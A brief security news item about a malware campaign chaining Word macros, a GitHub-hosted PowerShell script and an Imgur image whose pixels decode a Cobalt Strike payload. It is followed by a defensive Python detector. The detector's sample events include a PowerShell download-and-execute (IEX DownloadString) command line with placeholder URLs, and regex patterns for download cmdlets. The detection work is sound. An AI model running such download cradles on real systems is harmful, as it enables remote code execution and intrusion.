GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic (Security News, December 2020)
A new strain of malware uses Word files with macros to download a PowerShell script from GitHub.
This PowerShell script in turn downloads a legitimate image file from the image-hosting service Imgur and uses it to decode a Cobalt Strike script on Windows systems.
Word macro spins up PowerShell script hosted on GitHub.
Decoded script executes Cobalt Strike payload. The script recovered by manipulating the PNG's pixel values is a Cobalt Strike script.
Cobalt Strike is a legitimate penetration testing toolkit that allows attackers to deploy "Beacons" on compromised devices to remotely "Create shells, execute PowerShell scripts, perform privilege escalation, or spawn a new session to create a listener on the victim system."
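As an added defender-side example (not code from the original article or from the campaign), the Python check below runs over constructed process-creation events and flags the chain described above: Word spawning PowerShell, PowerShell downloading from GitHub or Imgur, and PowerShell touching image pixel data. The field names, the System.Drawing/GetPixel indicator, and every URL and command line are constructed assumptions, not artefacts from the campaign.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
# Hosts and paths are placeholders, not indicators from the campaign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://raw.githubusercontent.com/EXAMPLE/repo/main/stage.ps1')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-ChildItem C:\\temp"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c \"$i=[System.Drawing.Bitmap]::FromStream((New-Object Net.WebClient)"
                    ".OpenRead('https://i.imgur.com/EXAMPLE.png')); $i.GetPixel(0,0)\""},
]

# Download cmdlets/methods and the public hosting services named in the article.
DOWNLOAD_CMDLETS = re.compile(
    r"\b(?:downloadstring|downloadfile|openread|invoke-webrequest|iwr|invoke-restmethod|irm)\b", re.I)
HOSTING_URLS = re.compile(
    r"https?://(?:raw\.githubusercontent\.com|github\.com|gist\.github\.com|i\.imgur\.com|imgur\.com)/", re.I)
# Assumed indicator for pixel-value decoding in PowerShell (System.Drawing / GetPixel).
PIXEL_DECODE = re.compile(r"System\.Drawing|GetPixel", re.I)


def classify(event):
    """Return the detection labels triggered by one process-creation event."""
    labels = []
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    if image != "powershell.exe":
        return labels
    if parent == "winword.exe":
        labels.append("office_spawned_powershell")
    if DOWNLOAD_CMDLETS.search(cmd) and HOSTING_URLS.search(cmd):
        labels.append("powershell_download_from_public_hosting")
    if PIXEL_DECODE.search(cmd):
        labels.append("powershell_image_pixel_access")
    return labels


def scan(events):
    """Return (command line, labels) for every event that triggered at least one label."""
    hits = []
    for event in events:
        labels = classify(event)
        if labels:
            hits.append((event["CommandLine"], labels))
    return hits
```

Each label alone is noisy on a real estate; the chain value comes from correlating them on one host within a short window, with the Word-parent event as the anchor.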